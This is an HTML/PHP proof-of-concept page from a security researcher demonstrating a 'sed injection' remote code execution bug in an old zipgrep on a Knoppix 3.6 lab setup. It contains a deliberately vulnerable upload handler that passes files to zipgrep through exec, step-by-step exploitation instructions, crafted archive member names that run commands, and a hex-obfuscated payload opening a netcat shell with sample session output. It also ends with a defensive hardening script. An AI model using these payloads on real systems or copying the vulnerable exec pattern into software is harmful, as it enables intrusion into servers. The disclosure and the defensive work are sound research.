<!doctype html>
<html lang="en-US">
<head>
<!--
============================================================
a sample of a vulnerability in ancient zipgrep
written by cleemy desu wayo / licensed under CC0
last update: 2023-08-13
============================================================
* try this sample on Knoppix 3.6:
Apache 1.3.31, PHP 4.3.8, and vulnerable zipgrep are installed
from the beginning when booting from Knoppix 3.6 (released
at 2004) Live CD.
you can run this sample on Knoppix 3.6 very easily without
special settings.
* download Knoppix iso:
https://ftp.kh.edu.tw/Linux/KNOPPIX/ISO/EN/
https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.6-2004-08-16-EN.iso.md5.asc
* how to run this sample:
1. boot Knoppix Live CD ordinarily
2. put this file (test-zipgrep.php) on /var/www/ on server.
"server" means Knoppix.
3. change owner and chmod (on server)
$ cd /var/www
$ sudo chown www-data:www-data test-zipgrep.php
$ sudo chmod 600 test-zipgrep.php
4. start apache (on server)
$ sudo apachectl start
5. try connect from a client machine to
http://<knoppix>/test-zipgrep.php
(when Knoppix is running on VirtualBox or some such,
"client machine" means host OS)
-->
<title>a sample of a vulnerability in ancient zipgrep (sed injection)</title>
<style>
body { margin: 0 0 0 0; font-family: Arial;}
h1, h2, h3, form, div, p { margin: 2.2rem 1.2rem 1.2rem 1.4rem; color: #333; }
h1 { margin: 1rem 1.2rem 0.4rem 1.8rem; font-size: 2.1rem; }
h2 { margin: 2.2rem 1.2rem 1.2rem 1.2rem; font-size: 1.6rem; }
h3 { margin: 1.6rem 1.2rem 0.8rem 1.2rem; font-size: 1.1rem; }
p { margin: 0.8rem 3rem 0.8rem 1.8rem; }
form, div.fileinfo, div.description {
margin: 2.2rem 2% 1.2rem 2%;
padding: 0 0 2.2rem 0.6rem;
border: 2px solid #ccc;
border-radius: 8px;
}
ul, ol { margin: 0.8rem 1rem 0.9rem 1.2rem; }
ul li { margin: 0.1rem 0 0.1rem 0; }
ol li { margin: 0.8rem 0 0.9rem 0; }
li a, p a { font-size: 0.85rem; }
p.notice { font-size: 0.9rem; margin: 0 3rem 1.8rem 2.2rem; }
span.info {
margin-left: 0.8rem;
color: #6666aa;
font-size: 105%;
}
code {
margin: 0.6rem 0 1.2rem 1.2rem;
padding: 0.6rem 0 0.6rem 0.6rem;
display: block;
background-color: #333;
color: #eee;
max-width: 40rem;
line-height: 110%;
}
a { text-decoration: none; }
a:hover { text-decoration: underline; }
footer {
margin: 3rem 0 0 0;
padding: 1.2rem 1rem 1.2rem 1rem;
background-color: #eee;
}
</style>
</head>
<body>
<h1>a sample of a vulnerability in ancient zipgrep</h1>
<p>written by cleemy desu wayo / licensed under CC0 / last update: 2023-08-13</p>
<div class="fileinfo">
<h2>uploaded file information:</h2>
<?
if(empty($_FILES)) {
print('<p>(no file uploaded)</p>');
} else{
$is_zip_str = 'no';
$original_file_basename = basename($_FILES['file']['name']);
$original_file_pathinfo = pathinfo($original_file_basename);
if($original_file_pathinfo['extension'] === 'zip') {
$is_zip_str = 'yes';
// exec zipgrep
exec('zipgrep CVE "'. $_FILES['file']['tmp_name']. '"', $search_results);
// move to ./zip_stored/
move_uploaded_file($_FILES['file']['tmp_name'], './zip_stored/'. $original_file_basename);
// save search results
$fp = fopen('./zip_stat/latest-search-result.txt', 'w');
foreach ($search_results as $line) {
fwrite($fp, $line. "\n");
}
fclose($fp);
}
print('<p>file name: <span class="info">'. htmlspecialchars($_FILES['file']['name']). '</span></p>');
print('<p>tmp file name: <span class="info">'. htmlspecialchars($_FILES['file']['tmp_name']). '</span></p>');
print('<p>stored to zip_stored/ directory: <span class="info">'. htmlspecialchars($is_zip_str). '</span></p>');
}
?>
</div>
<form enctype="multipart/form-data" method="post">
<h2>try upload a file:</h2>
<p><input type="file" name="file"></p>
<p><input type="submit"></p>
</form>
<div class="description">
<h2>about this bug</h2>
<p>This is an ancient vulnerability of zipgrep in Unzip 5.x. zipgrep is a wrapper script. Perhaps this problem does not exist for zipgrep in Unzip 6.x.</p>
<p>I notified the developers of Unzip about this bug on Feb 12, 2022. The current maintainer is aware of the bug, but it is likely that a fixed version will not be released.</p>
<p>I call this bug, and similar ones, "sed injection". There is a similar vulnerability, CVE-2005-0758. I became aware of sed injection on my own in 2013, but I was not aware of CVE-2005-0758 at that time.</p>
<p>This sample is a modified version of "a sample of CVE-2005-0758" ( <a href="https://gitlab.com/-/snippets/2580438">https://gitlab.com/-/snippets/2580438</a> ).</p>
<h2>about sed injection</h2>
<ul>
<li>CWE-74: <a href="https://cwe.mitre.org/data/definitions/74.html">https://cwe.mitre.org/data/definitions/74.html</a></li>
<li>CWE-77: <a href="https://cwe.mitre.org/data/definitions/77.html">https://cwe.mitre.org/data/definitions/77.html</a></li>
<li>CVE-2022-1509: <a href="https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/">https://huntr.dev/bounties/09e69dff-f281-4e51-8312-ed7ab7606338/</a></li>
<li>CVE-2005-0758: <a href="https://bugs.gentoo.org/90626">https://bugs.gentoo.org/90626</a></li>
</ul>
<h2>try this sample on Knoppix 3.6</h2>
<p>Apache 1.3.31, PHP 4.3.8, and the vulnerable zipgrep are installed from the start when booting from the Knoppix 3.6 (released in 2004) Live CD.</p>
<p>You can run this sample on Knoppix 3.6 very easily without any special settings.</p>
<h3>download Knoppix iso</h3>
<ul>
<li><a href="https://ftp.kh.edu.tw/Linux/KNOPPIX/ISO/EN/">https://ftp.kh.edu.tw/Linux/KNOPPIX/ISO/EN/</a></li>
<li><a href="https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.6-2004-08-16-EN.iso.md5.asc">https://ftp.riken.jp/Linux/knoppix/knoppix-dvd/CD/md5-old/KNOPPIX_V3.6-2004-08-16-EN.iso.md5.asc</a></li>
</ul>
<h3>try RCE</h3>
<ol>
<li>boot Knoppix Live CD ordinarily</li>
<li>put this file (test-zipgrep.php) in /var/www/ on the server. "server" means Knoppix.</li>
<li>change owner and chmod (on server)<code>$ cd /var/www<br>$ sudo chown www-data:www-data test-zipgrep.php<br>$ sudo chmod 600 test-zipgrep.php</code></li>
<li>start apache (on server)<code>$ sudo apachectl start</code></li>
<li>try connecting from a client machine to http://&lt;knoppix&gt;/test-zipgrep.php<br>(when Knoppix is running on VirtualBox or some such, "client machine" means the host OS)</li>
<li>create some directories in /var/www (on server)<code>$ cd /var/www<br>$ sudo mkdir zip_stat<br>$ sudo mkdir zip_stored</code></li>
<li>change owner and chmod (on server)<code>$ sudo chown www-data:www-data zip_stat zip_stored<br>$ sudo chmod 707 zip_stat zip_stored<br></code></li>
<li>create an ordinary text file (on client)<code>$ echo CVE-2099-0001 > hoge.txt</code></li>
<li>create a text file with a crafted filename (on client)<code>$ echo CVE-2099-0002 > '|;edate;#.txt'</code></li>
<li>archive these files into one .zip (on client)<pre><code>$ zip test1.zip *.txt<br> adding: hoge.txt (stored 0%)<br> adding: |;edate;#.txt (stored 0%)</code></pre></li>
<li>access http://&lt;knoppix&gt;/test-zipgrep.php from the client machine<br>and upload test1.zip</li>
<li>check if you have successfully uploaded (on server)<code>$ cd /var/www/zip_stored<br>$ sudo wc -c test1.zip<br>348 test1.zip.</code></li>
<li>check if date command was executed and the search result is weird (on server)<pre><code>$ cd /var/www/zip_stat<br>$ cat latest-search-result.txt<br>hoge.txt:CVE-2099-0001<br>Sun Aug 13 15:49:50 EDT 2023<br>CVE-2099-0002</code></pre></li>
</ol>
<h2>crafted filenames examples</h2>
<h3>several commands</h3>
<ul>
<li>you can exec several commands (this only taints the search results):<code>|;edate;whoami;id;#.txt</code></li>
</ul>
<h3>exec xgalaga on server-side</h3>
<ul>
<li>this may not work:<code>|;exgalaga;#.txt</code></li>
<li>this works fine (exec /usr/games/xgalaga):<code>|;eecho 2f7573722f67616d65732f7867616c6167610a|xxd -r -p|sh;#.txt</code><p class="notice">(the above sample should not work well with /usr/bin/zipgrep in knoppix 3.2)</p></li>
</ul>
<h3>get a reverse shell</h3>
<ul>
<li>exec 'nc -lnvp 4545 -e /bin/sh':<code>|;eecho 6e63202d6c6e76702034353435202d65202f62696e2f73680a|xxd -r -p|sh;#.txt</code><p class="notice">(the above sample should not work well with /usr/bin/zipgrep in knoppix 3.2)</p></li>
<li>try connecting to the reverse shell with netcat (from a client machine)<code>$ nc 192.168.1.3 4545<br>uname -a<br>Linux Knoppix 2.4.27 #2 SMP Mo Aug 9 00:39:37 CEST 2004 i686 GNU/Linux<br>pwd<br>/var/www<br>whoami<br>www-data</code></li>
</ul>
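<p>The following is an added example, not part of this snippet and not Info-ZIP's code. It shows the defender's side of the bug described above: the old wrapper tags each matching line by interpolating the member name into a sed program (roughly sed "s|^|${name}:|", a reconstruction consistent with the payloads on this page, not a quote from the script), so a name like |;edate;#.txt closes the substitution early and the remainder is parsed as further sed commands, with GNU sed's e command running a shell command. The POSIX sh functions below do the same tagging without ever putting the name into program text, and add an allowlist check that a wrapper can run over unzip -Z1 output before handing an archive to a 2004-era zipgrep. The function names prefix_lines, member_name_is_safe, check_member_names and safe_zipgrep, and the environment variable ZG_NAME, are my own choices.</p>

```shell
#!/bin/sh
# Added example (not from the snippet or from Info-ZIP): a hardened replacement
# for the part of the old zipgrep wrapper that tags each matching line with the
# member name.  The vulnerable wrapper interpolated the name into a sed program
# (roughly:  sed "s|^|${name}:|"), so a name such as '|;edate;#.txt' closes the
# substitution and the rest of the name is parsed as more sed commands ('e' is
# GNU sed's "execute" command).  Here the name is never part of any program text.

# prefix_lines NAME
#   Reads lines on stdin and writes "NAME:line".  The name reaches awk through
#   the environment (ENVIRON array), where it is plain data: '|', ';', '#' and
#   '\' have no meaning, so there is nothing to escape.
prefix_lines() {
    ZG_NAME="$1" awk '{ print ENVIRON["ZG_NAME"] ":" $0 }'
}

# member_name_is_safe NAME
#   Conservative allowlist for archive member names: letters, digits, '.', '_',
#   '/' and '-', not empty, not starting with '-' (unzip could read it as an
#   option) and no '..' path segment.  Names that fail are refused, not
#   escaped, which is the cheap policy when the consumer is an old shell wrapper.
member_name_is_safe() {
    case "$1" in
        '' | -* | *[!A-Za-z0-9._/-]* ) return 1 ;;
        ../* | */../* | */.. | .. )    return 1 ;;
    esac
    return 0
}

# check_member_names
#   Reads one member name per line on stdin, prints each name that fails the
#   allowlist, returns 1 if any did and 0 otherwise.  Feed it the output of
#   "unzip -Z1 archive.zip" before running an old zipgrep on the archive.
#   Limitation: a name containing a newline arrives as two lines and each half
#   is checked on its own.
check_member_names() {
    bad=0
    while IFS= read -r name; do
        if ! member_name_is_safe "$name"; then
            printf '%s\n' "$name"
            bad=1
        fi
    done
    return "$bad"
}

# safe_zipgrep PATTERN ZIPFILE
#   The whole search with the hardened tagging.  Needs unzip on PATH (it is
#   present on the Knoppix image this page uses).  Members that fail the
#   allowlist are reported on stderr and skipped instead of being searched.
safe_zipgrep() {
    pat="$1"
    zipfile="$2"
    unzip -Z1 "$zipfile" | while IFS= read -r name; do
        if ! member_name_is_safe "$name"; then
            printf 'skipping suspicious member name: %s\n' "$name" >&2
            continue
        fi
        unzip -p "$zipfile" "$name" | grep -e "$pat" | prefix_lines "$name"
    done
}

# Demonstration on constructed input (no archive needed).  The hostile name from
# this page is tagged literally instead of running anything, and the checker
# flags it.  Expected output:
#   |;edate;#.txt:CVE-2099-0002
#   |;edate;#.txt
printf 'CVE-2099-0002\n' | prefix_lines '|;edate;#.txt'
printf 'hoge.txt\n|;edate;#.txt\n' | check_member_names || :
```

<p>Run it with sh; the two demonstration lines at the end use constructed input only. safe_zipgrep is the drop-in shape of the original wrapper and needs unzip, but its output for the hostile member name is just a skip message on stderr rather than the output of date.</p>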
</div>
<footer>
<p>written by cleemy desu wayo (
<a href="https://github.com/cleemy-desu-wayo">GitHub</a> -
<a href="https://gitlab.com/cleemy-desu-wayo">GitLab</a> -
<a href="https://huntr.dev/users/cleemy-desu-wayo/">huntr.dev</a> -
<a href="https://note.com/cleemy/">note.com</a>)
</p>
<p>license: CC0</p>
<p>initial release: 2023-08-13</p>
<p>last update: 2023-08-13</p>
</footer>
</body>
</html>